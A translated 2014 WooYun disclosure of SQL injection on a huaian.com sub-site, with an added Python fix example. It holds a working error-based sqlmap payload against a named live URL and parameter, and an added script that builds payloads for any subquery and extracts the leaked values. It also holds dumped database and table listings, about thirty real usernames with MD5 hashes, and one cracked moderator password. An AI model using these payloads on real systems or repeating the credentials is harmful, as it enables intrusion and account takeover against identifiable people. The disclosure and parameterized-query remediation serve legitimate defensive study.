
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-019043

Title: 淮安网 SQL injection, partial data leak from the main site

Vendor: 淮安网

Author: if、so

Submitted: 2014-06-04 21:12

Fixed: 2014-07-23 18:17

Published: 2014-07-23 18:17

Type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2014-06-04: actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-07-23: vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on 淮安网 leaks data from the main site's database; the data can be obtained without authorization.

Detailed description:

As someone from Huai'an, Jiangsu, I ought to make a small contribution to my hometown's network security; Huai'an's guandan card game is famous, after all.
The injection is on a 淮安网 sub-site: http://2012fz.huaian.com

Target: http://2012fz.huaian.com/show.php

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: aid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: aid=0' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x3a73786d3a,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x3a64666c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WxLW'='WxLW&name=nnyfbetd&sex=%e7%94%b7&Submit2=%e6%8f%90%e4%ba%a4&tel=555-666-0606&address=1
---

(The 0-request count means this run reused an injection point stored in sqlmap's session file rather than re-testing it. The other POST fields, name, sex, Submit2, tel and address, are just the form's normal fields; only aid is injected.)
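How the error-based payload above leaks data: the two hex literals are marker strings (0x3a73786d3a is ":sxm:", 0x3a64666c3a is ":dfl:"), the subquery result is concatenated between them, and FLOOR(RAND(0)*2) is used as a GROUP BY key so that MySQL collides on the same key while building its temporary table and raises "Duplicate entry '...' for key 'group_key'", with the wanted value inside the quoted key. The Python script below is an added example, not part of the original report and not sqlmap's own code: it rebuilds the page's payload for an arbitrary scalar subquery and parses the leaked value out of the error text. The error responses are constructed here, not captured from the site.

```python
import re

# Marker hex literals copied from the sqlmap payload on this page.
# 0x3a73786d3a decodes to ":sxm:", 0x3a64666c3a to ":dfl:".
PREFIX_HEX = "0x3a73786d3a"
SUFFIX_HEX = "0x3a64666c3a"

# The exact aid value from the page, used to check the builder below.
PAGE_PAYLOAD = (
    "0' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x3a73786d3a,(SELECT (CASE WHEN "
    "(2135=2135) THEN 1 ELSE 0 END)),0x3a64666c3a,FLOOR(RAND(0)*2))x FROM "
    "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WxLW'='WxLW"
)


def hex_literal_to_str(literal):
    """Decode a MySQL 0x... hex string literal into text."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


def build_error_payload(subquery, seed=2135):
    """Reproduce the page's FLOOR(RAND(0)*2) duplicate-key payload for any scalar subquery.

    RAND(0) is a fixed sequence, so the GROUP BY key repeats on the second row
    and MySQL reports the key in a Duplicate-entry error; the key carries the
    subquery result between the two markers.
    """
    return (
        f"0' AND (SELECT {seed} FROM(SELECT COUNT(*),CONCAT({PREFIX_HEX},({subquery}),"
        f"{SUFFIX_HEX},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
        f"GROUP BY x)a) AND 'WxLW'='WxLW"
    )


# The MySQL error that carries the leaked value (ER_DUP_ENTRY, 1062).
DUPLICATE_ENTRY = re.compile(r"Duplicate entry '(?P<entry>.*?)' for key '(?P<key>[^']*)'")


def extract_from_error(response_text):
    """Return the text between the markers in a Duplicate-entry error, or None."""
    prefix = hex_literal_to_str(PREFIX_HEX)
    suffix = hex_literal_to_str(SUFFIX_HEX)
    match = DUPLICATE_ENTRY.search(response_text)
    if match is None:
        return None
    entry = match.group("entry")
    start = entry.find(prefix)
    if start < 0:
        return None
    end = entry.find(suffix, start + len(prefix))
    if end < 0:
        # Closing marker cut off: MySQL truncates long keys in this message,
        # which is why sqlmap reads long values in MID() chunks, not at once.
        return None
    return entry[start + len(prefix):end]


# Constructed sample responses (not captured from the site).
# The first is what the page's own payload yields: CASE WHEN 2135=2135 THEN 1 -> "1".
SAMPLE_TRUE = "ERROR 1062 (23000): Duplicate entry ':sxm:1:dfl:1' for key 'group_key'"
# What the same technique yields for the subquery SELECT DATABASE().
SAMPLE_DBNAME = "ERROR 1062 (23000): Duplicate entry ':sxm:huaiancom:dfl:1' for key 'group_key'"
# A page that did not error: nothing to extract.
SAMPLE_CLEAN = "<html>article not found</html>"


if __name__ == "__main__":
    print(build_error_payload("SELECT DATABASE()"))
    print(extract_from_error(SAMPLE_TRUE))    # 1
    print(extract_from_error(SAMPLE_DBNAME))  # huaiancom
    print(extract_from_error(SAMPLE_CLEAN))   # None
```

The "1" in the first sample is the boolean probe sqlmap uses to confirm the injection point (CASE WHEN 2135=2135 THEN 1); swapping the subquery for SELECT DATABASE() or a row from pw_members is how the database list and the credential dump later in the report are pulled out one value at a time.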


Databases obtained:

[*] gs_data
[*] house
[*] huaiancom
[*] huaianw
[*] information_schema


huaiancom is clearly the database behind 淮安网 itself.
Listing the tables of www.huaian.com to find the user table:

Database: huaiancom
[434 tables]
+--------------------------------+
| ku6_members |
| ku6_video |
| pw_actattachs |
| pw_actions |
| pw_active |
| pw_activity |
| pw_activitycate |
| pw_activitydefaultvalue |
| pw_activityfield |
| pw_activitymembers |
| pw_activitymodel |
| pw_activitymodel_copy |
| pw_activitypaylog |
| pw_activityvalue1 |
| pw_activityvalue10 |
| pw_activityvalue11 |
| pw_activityvalue12 |
| pw_activityvalue13 |
| pw_activityvalue14 |
| pw_activityvalue15 |
| pw_activityvalue16 |
| pw_activityvalue17 |
| pw_activityvalue18 |
| pw_activityvalue19 |
| pw_activityvalue2 |
| pw_activityvalue20 |
| pw_activityvalue21 |
| pw_activityvalue22 |
| pw_activityvalue23 |
| pw_activityvalue24 |
| pw_activityvalue26 |
| pw_activityvalue27 |
| pw_activityvalue28 |
| pw_activityvalue29 |
| pw_activityvalue3 |
| pw_activityvalue31 |
| pw_activityvalue31_copy |
| pw_activityvalue32 |
| pw_activityvalue32_copy |
| pw_activityvalue33 |
| pw_activityvalue33_copy |
| pw_activityvalue35 |
| pw_activityvalue36 |
| pw_activityvalue37 |
| pw_activityvalue4 |
| pw_activityvalue5 |
| pw_activityvalue6 |
| pw_activityvalue7 |
| pw_activityvalue8 |
| pw_activityvalue9 |
| pw_actmember |
| pw_actmembers |
| pw_administrators |
| pw_adminlog |
| pw_adminset |
| pw_advert |
| pw_advert_copy |
| pw_advert_error |
| pw_announce |
| pw_area_level |
| pw_areas |
| pw_argument |
| pw_attachbuy |
| pw_attachdownload |
| pw_attachs |
| pw_attention |
| pw_attention_blacklist |
| pw_auth_certificate |
| pw_ban |
| pw_banuser |
| pw_bbsinfo |
| pw_block |
| pw_buyadvert |
| pw_cache |
| pw_cache_distribute |
| pw_cache_members |
| pw_cachedata |
| pw_cdgoods |
| pw_cdorder |
| pw_cdpay |
| pw_channel |
| pw_clientorder |
| pw_cmembers |
| pw_cms_article |
| pw_cms_articlecontent |
| pw_cms_articleextend |
| pw_cms_attach |
| pw_cms_column |
| pw_cms_comment |
| pw_cms_commentreply |
| pw_cms_purview |
| pw_cnalbum |
| pw_cnclass |
| pw_cnlevel |
| pw_cnphoto |
| pw_cnskin |
| pw_cnstyles |
| pw_collection |
| pw_collectiontype |
| pw_colonys |
| pw_comment |
| pw_company |
| pw_config |
| pw_creditlog |
| pw_credits |
| pw_customfield |
| pw_cwritedata |
| pw_datanalyse |
| pw_datastate |
| pw_datastore |
| pw_debatedata |
| pw_debates |
| pw_delta_diarys |
| pw_delta_members |
| pw_delta_posts |
| pw_delta_threads |
| pw_diary |
| pw_diarytype |
| pw_draft |
| pw_efone_statistics |
| pw_efone_statistics_month |
| pw_elements |
| pw_elements_copy |
| pw_elements_copy1 |
| pw_ext_info_access |
| pw_ext_info_attach |
| pw_ext_info_cate |
| pw_ext_info_field |
| pw_ext_info_fieldvalue10 |
| pw_ext_info_fieldvalue11 |
| pw_ext_info_fieldvalue12 |
| pw_ext_info_fieldvalue13 |
| pw_ext_info_fieldvalue14 |
| pw_ext_info_fieldvalue15 |
| pw_ext_info_fieldvalue16 |
| pw_ext_info_fieldvalue17 |
| pw_ext_info_fieldvalue18 |
| pw_ext_info_fieldvalue19 |
| pw_ext_info_fieldvalue2 |
| pw_ext_info_fieldvalue20 |
| pw_ext_info_fieldvalue21 |
| pw_ext_info_fieldvalue22 |
| pw_ext_info_fieldvalue24 |
| pw_ext_info_fieldvalue25 |
| pw_ext_info_fieldvalue26 |
| pw_ext_info_fieldvalue27 |
| pw_ext_info_fieldvalue28 |
| pw_ext_info_fieldvalue3 |
| pw_ext_info_fieldvalue30 |
| pw_ext_info_fieldvalue31 |
| pw_ext_info_fieldvalue32 |
| pw_ext_info_fieldvalue33 |
| pw_ext_info_fieldvalue35 |
| pw_ext_info_fieldvalue36 |
| pw_ext_info_fieldvalue37 |
| pw_ext_info_fieldvalue38 |
| pw_ext_info_fieldvalue39 |
| pw_ext_info_fieldvalue4 |
| pw_ext_info_fieldvalue40 |
| pw_ext_info_fieldvalue41 |
| pw_ext_info_fieldvalue42 |
| pw_ext_info_fieldvalue43 |
| pw_ext_info_fieldvalue44 |
| pw_ext_info_fieldvalue45 |
| pw_ext_info_fieldvalue46 |
| pw_ext_info_fieldvalue47 |
| pw_ext_info_fieldvalue48 |
| pw_ext_info_fieldvalue49 |
| pw_ext_info_fieldvalue5 |
| pw_ext_info_fieldvalue50 |
| pw_ext_info_fieldvalue51 |
| pw_ext_info_fieldvalue52 |
| pw_ext_info_fieldvalue53 |
| pw_ext_info_fieldvalue54 |
| pw_ext_info_fieldvalue55 |
| pw_ext_info_fieldvalue6 |
| pw_ext_info_fieldvalue7 |
| pw_ext_info_fieldvalue8 |
| pw_ext_info_fieldvalue9 |
| pw_ext_info_info |
| pw_ext_info_post |
| pw_ext_info_report |
| pw_ext_info_select_search |
| pw_ext_info_thread |
| pw_ext_info_tmsg |
| pw_ext_picvote_item |
| pw_ext_picvote_log |
| pw_ext_picvote_post |
| pw_ext_thread_baseconfig |
| pw_extragroups |
| pw_favors |
| pw_feed |
| pw_filter |
| pw_filter_class |
| pw_filter_dictionary |
| pw_filter_record |
| pw_focus |
| pw_forumdata |
| pw_forumlog |
| pw_forummsg |
| pw_forums |
| pw_forumsell |
| pw_forumsextra |
| pw_friends |
| pw_friendtype |
| pw_group_replay |
| pw_hack |
| pw_help |
| pw_hits_threads |
| pw_house_agency |
| pw_house_area |
| pw_house_broker |
| pw_house_brokergroup |
| pw_house_brokerright |
| pw_house_developer |
| pw_house_evaluations |
| pw_house_expired |
| pw_house_feed |
| pw_house_fields |
| pw_house_groupbuy |
| pw_house_hireinfo |
| pw_house_hiremodifytime_index |
| pw_house_hireoverdue |
| pw_house_hireposttime_index |
| pw_house_hireprice_index |
| pw_house_image |
| pw_house_imagedata |
| pw_house_imagetype |
| pw_house_info |
| pw_house_infoextra |
| pw_house_map |
| pw_house_pagecache |
| pw_house_personal |
| pw_house_pricedetail |
| pw_house_pushdata |
| pw_house_recommend |
| pw_house_report |
| pw_house_saleinfo |
| pw_house_salemodifytime_index |
| pw_house_saleoverdue |
| pw_house_saleposttime_index |
| pw_house_saleprice_index |
| pw_house_saleunitprice_index |
| pw_house_secondimage |
| pw_house_secondpost |
| pw_house_userscore |
| pw_house_video |
| pw_house_vrange |
| pw_invitecode |
| pw_inviterecord |
| pw_invoke |
| pw_invokepiece |
| pw_ipstates |
| pw_job |
| pw_jober |
| pw_kmd_info |
| pw_kmd_paylog |
| pw_kmd_spread |
| pw_kmd_user |
| pw_log_aggregate |
| pw_log_attachs |
| pw_log_colonys |
| pw_log_diary |
| pw_log_forums |
| pw_log_members |
| pw_log_postdefend |
| pw_log_posts |
| pw_log_postverify |
| pw_log_setting |
| pw_log_threads |
| pw_log_userdefend |
| pw_log_weibos |
| pw_medal_apply |
| pw_medal_award |
| pw_medal_info |
| pw_medal_log |
| pw_medalinfo |
| pw_medalslogs |
| pw_medaluser |
| pw_member_behavior_statistic |
| pw_membercredit |
| pw_memberdata |
| pw_memberinfo |
| pw_members |
| pw_membertags |
| pw_membertags_relations |
| pw_memo |
| pw_modehot |
| pw_mpageconfig |
| pw_ms_attachs |
| pw_ms_configs |
| pw_ms_messages |
| pw_ms_relations |
| pw_ms_replies |
| pw_ms_searchs |
| pw_ms_tasks |
| pw_msg |
| pw_msgc |
| pw_msglog |
| pw_nav |
| pw_navold |
| pw_news |
| pw_news_copy |
| pw_oboard |
| pw_online |
| pw_online_guest |
| pw_online_statistics |
| pw_online_user |
| pw_ouserdata |
| pw_overprint |
| pw_owritedata |
| pw_pagecache |
| pw_pageinvoke |
| pw_pcfield |
| pw_pcmember |
| pw_pcvalue1 |
| pw_permission |
| pw_phone_sign |
| pw_pidtmp |
| pw_pinglog |
| pw_plan |
| pw_polls |
| pw_portalpage |
| pw_postcate |
| pw_posts |
| pw_postsfloor |
| pw_poststopped |
| pw_privacy |
| pw_proclock |
| pw_protectedmembers |
| pw_pushdata |
| pw_pushpic |
| pw_rate |
| pw_rateconfig |
| pw_rateresult |
| pw_recycle |
| pw_replyreward |
| pw_replyrewardrecord |
| pw_report |
| pw_reward |
| pw_robbuild |
| pw_robbuildfloor |
| pw_schcache |
| pw_school |
| pw_searchadvert |
| pw_searchforum |
| pw_searchfourm |
| pw_searchhotwords |
| pw_searchstatistic |
| pw_setform |
| pw_sharelinks |
| pw_sharelinksrelation |
| pw_sharelinkstype |
| pw_shop_adlogs |
| pw_shop_ads |
| pw_shop_cats |
| pw_shop_products |
| pw_shop_sellers |
| pw_shop_settings |
| pw_singleright |
| pw_smiles |
| pw_space |
| pw_sqlcv |
| pw_stamp |
| pw_statistics_daily |
| pw_statistics_uniqueidentifier |
| pw_stopic |
| pw_stopic_comment |
| pw_stopic_commentreply |
| pw_stopicblock |
| pw_stopiccategory |
| pw_stopicpictures |
| pw_stopicunit |
| pw_styles |
| pw_tagdata |
| pw_tags |
| pw_task |
| pw_temp_keywords |
| pw_threads |
| pw_threads_at |
| pw_threads_img |
| pw_tmsgs |
| pw_toollog |
| pw_tools |
| pw_topiccate |
| pw_topicfield |
| pw_topicmodel |
| pw_topictype |
| pw_topicvalue1 |
| pw_topicvalue2 |
| pw_topicvalue3 |
| pw_topicvalue4 |
| pw_topicvalue5 |
| pw_topicvalue6 |
| pw_topicvalue7 |
| pw_topicvalue8 |
| pw_tpl |
| pw_tpltype |
| pw_trade |
| pw_tradeorder |
| pw_ucapp |
| pw_ucnotify |
| pw_ucsyncredit |
| pw_user_career |
| pw_user_education |
| pw_userapp |
| pw_userbinding |
| pw_usercache |
| pw_usergroups |
| pw_usertool |
| pw_voter |
| pw_wappush |
| pw_wappushtype |
| pw_weibo_bind |
| pw_weibo_cmrelations |
| pw_weibo_cnrelations |
| pw_weibo_comment |
| pw_weibo_content |
| pw_weibo_login_session |
| pw_weibo_login_user |
| pw_weibo_referto |
| pw_weibo_relations |
| pw_weibo_topicattention |
| pw_weibo_topicrelations |
| pw_weibo_topics |
| pw_windcode |
| pw_wordfb |
| pw_write_smiles |
| pw_yun_setting |
| tp_liuyan |
| tp_params |
| tp_toupiao |
| tp_type |
| tp_userinfo |
+--------------------------------+


The pw_ table prefix makes it clear the site runs phpwind's forum product.
Some of the data obtained (username, MD5 password hash):

[*] 0game, 9886421ac78a8c5fe24d21fc3a22b6c5
[*] 椋炴瘺鑵? 28c79193c9c864f25add867dd4428673
[*] 鑾剚鍓嶈矾鏃犵煡宸? 3cea5f565e8a5652cec646b4278de266
[*] 灞辨按2009, f0c3c7056a20dbde5f0c3c5c0d0fbc9f
[*] CLLJH9698, 5f402a814720ffde966ed9037187c4d6
[*] 娼樻綐椋熺, a25f2ae0e4fd49e51382c4584fa37ddf
[*] 鎺ョ潃蹇芥偁, f4e8ec1716eefa2e82aa5e4c51315f11
[*] 鐜僵鍙綋, be40464f24be6cffd411c988febc95d1
[*] 鐧界懢鐟滅煶, fc45ef777337af12cb04c7c221e2a78e
[*] 澶х溂濡傜伅, d6c75747ad53339c2c288d77195a8aa4
[*] 鎺艰泲鐜嬪晩, d889616a51419e3c86ba519624a13472
[*] 鑺辫嚜椋?姘磋嚜娴? caf13895138087fc58759e8a43564358
[*] kaifanle, db0c2ae699a25c028a3df52924991f34
[*] 蹇靛康棰嗚垶, aeb0ce54a0fa22b62c1c8c390e3b03c4
[*] 鍏粊寰嬪笀, 0df349c6633881c674d0701956a7cd6b
[*] 鍎掗泤鎺煎悰, 48f307f08bbb60ba7fc469f0678c5aa1
[*] 杈撲簡浣犺耽浜嗕笘鐣? f76f12c214a4fff29bd0b47cfb59b41c
[*] bd4vng, 2e9a2f5568250ef5039babe48f864d64
[*] 鏉炬锭鏈? f7226f9805ab7a8e3b3fab6d98aad4c9
[*] 澶ц倸寮ュ嫆, 9ac111e29ed57d3819c2259ecf646c16
[*] 浼樿鐨勭瑧, 4297f44b13955235245b2497399d7a93
[*] 娴庡崡濡瑰, f7dca9503e10f14a968058a62ce15d4c
[*] yangbb007, 53eae5d4e7f7156a28486cebdd6d329b
[*] 娓呴泤鑼夎帀, 25f9e794323b453885f5181f1b624d0b
[*] 鍚洦娈嬪彾, 3158bbac7deda08855b3be7b25cfaec0
[*] 绱鏃犲悕, b7b57c76e264f7bc5a23d1486e0cdf1b
[*] 涓浗浜ら€? ad7aaa5004581969b0c0faec65829e2d
[*] 灏忔笖鍎? 9299fb5a3e8f2907cdaffcfa839c3ca2
[*] fks浜ㄥ埄, 9f08e0e14eb93c9cd05fdcae991d5f35
[*] 濡傛灉閭d箞, 07f73e5daf29820a60269416f715eea9
[*] BG4VOE, d852033b05f655f827ad78d97928d757


Chinese usernames come out garbled (UTF-8 bytes displayed as GBK).
Cracking the MD5 gives the password of CLLJH9698 as 791226. And that account is a moderator!!

[screenshot: 1.jpg]

There is a great deal of data; probably several hundred thousand rows.

Proof of vulnerability:

(Same sqlmap injection point and database list as in the detailed description above.)


[screenshot: 1.jpg]

Fix recommendation:

(none given by the author)
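The report leaves the fix blank. The remediation for an injection point like the one above is to stop concatenating aid into the SQL string and bind it as a parameter instead. The Python/SQLite script below is an added example, not the site's PHP code: its articles table and show_vulnerable/show_safe functions are hypothetical stand-ins for whatever show.php does with aid. It puts the concatenated query beside the bound-parameter version and feeds both a plain tautology and the page's own aid payload.

```python
import sqlite3

# The aid value from the page's sqlmap output, used here purely as an input string.
PAGE_PAYLOAD = (
    "0' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x3a73786d3a,(SELECT (CASE WHEN "
    "(2135=2135) THEN 1 ELSE 0 END)),0x3a64666c3a,FLOOR(RAND(0)*2))x FROM "
    "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WxLW'='WxLW"
)


def make_db():
    """Constructed stand-in for the article table show.php reads (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (aid TEXT PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [("1", "first article"), ("2", "second article"), ("3", "third article")],
    )
    return conn


def show_vulnerable(conn, aid):
    """Builds the query by string concatenation, so the quote in aid is live SQL.

    This is the pattern the page's payload relies on: aid=0' AND ... 'WxLW'='WxLW
    closes the literal, injects a condition, then reopens it to keep the syntax valid.
    """
    sql = "SELECT title FROM articles WHERE aid='" + aid + "'"
    return [row[0] for row in conn.execute(sql)]


def show_safe(conn, aid):
    """Same lookup with a bound parameter: aid is passed as data and never parsed as SQL.

    With binding, the page's whole payload is just a string that matches no row.
    """
    rows = conn.execute("SELECT title FROM articles WHERE aid=?", (aid,))
    return [row[0] for row in rows]


def show_safe_numeric(conn, aid):
    """Binding plus an input-shape check: an article id is a number, reject anything else."""
    if not aid.isdigit():
        return []
    return show_safe(conn, aid)


if __name__ == "__main__":
    conn = make_db()
    tautology = "0' OR '1'='1"
    print(show_vulnerable(conn, "2"))            # ['second article']
    print(show_vulnerable(conn, tautology))      # every row: the injected OR wins
    print(show_safe(conn, tautology))            # []
    print(show_safe(conn, PAGE_PAYLOAD))         # []
    print(show_safe_numeric(conn, PAGE_PAYLOAD)) # []
```

The tautology is used for the vulnerable path because SQLite has no RAND()/CONCAT/INFORMATION_SCHEMA, so the page's MySQL-specific payload would only raise a syntax error there; the point is the same, since the concatenated query interprets whatever follows the first quote. The numeric check is an extra layer, not a substitute for binding: the parameterized query is what makes the injection impossible.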

Copyright notice: please credit the source when republishing: if、so@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined the report.